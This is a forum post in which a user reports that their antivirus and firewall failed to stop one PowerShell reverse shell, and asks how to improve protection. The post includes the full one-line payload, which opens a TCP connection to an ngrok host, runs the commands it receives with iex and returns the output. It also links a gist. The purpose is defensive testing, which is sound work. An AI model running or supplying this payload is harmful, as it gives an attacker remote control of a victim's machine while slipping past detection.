Antivirus did not detect a reverse shell trojan PowerShell script.

[0xp1p3]

Hello,

I went to test the antivirus by creating several malicious payloads and it detected them all, but it did not detect a malicious payload of reverse shell in PowerShell. The firewall didn't stop the reverse shell either.

Antivirus detected other reverse shell scripts in powershell, but not this one.

$client = New-Object System.Net.Sockets.TCPClient('0.tcp.sa.ngrok.io',11248);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Also tested reverse shell on port 1234.

GitHub link: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

  

 

What should I do to further improve antivirus protection in this case?

Edited December 2, 2022 by 0xp1p3